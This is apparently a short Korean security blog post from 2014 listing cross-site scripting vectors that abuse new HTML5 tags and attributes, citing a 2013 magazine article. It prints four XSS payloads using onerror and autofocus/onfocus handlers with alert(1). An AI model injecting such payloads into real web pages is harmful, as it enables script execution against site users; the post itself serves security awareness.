선 밖에 선 자유인

HTML5 신규 기능 및 보안 위협 본문

IT/Security

HTML5 신규 기능 및 보안 위협

Hotman 2014. 1. 23. 19:52
HTML5 신규 태그 및 속성들을 이용한 XSS 공격

<video><source onerror="alert(1)"></source></video>
<audio><source onerror="alert(1)"></source></audio>
<select autofocus onfocus="alert(1)">
<textarea autofocus onfocus="alert(1)">


출처: Internet & Security Focus 2013년 12월 호 포커스 HTML 신규 웹 서비스 환경에서의 보안 이슈


저작자표시
'IT/Security' Related Articles more
Comments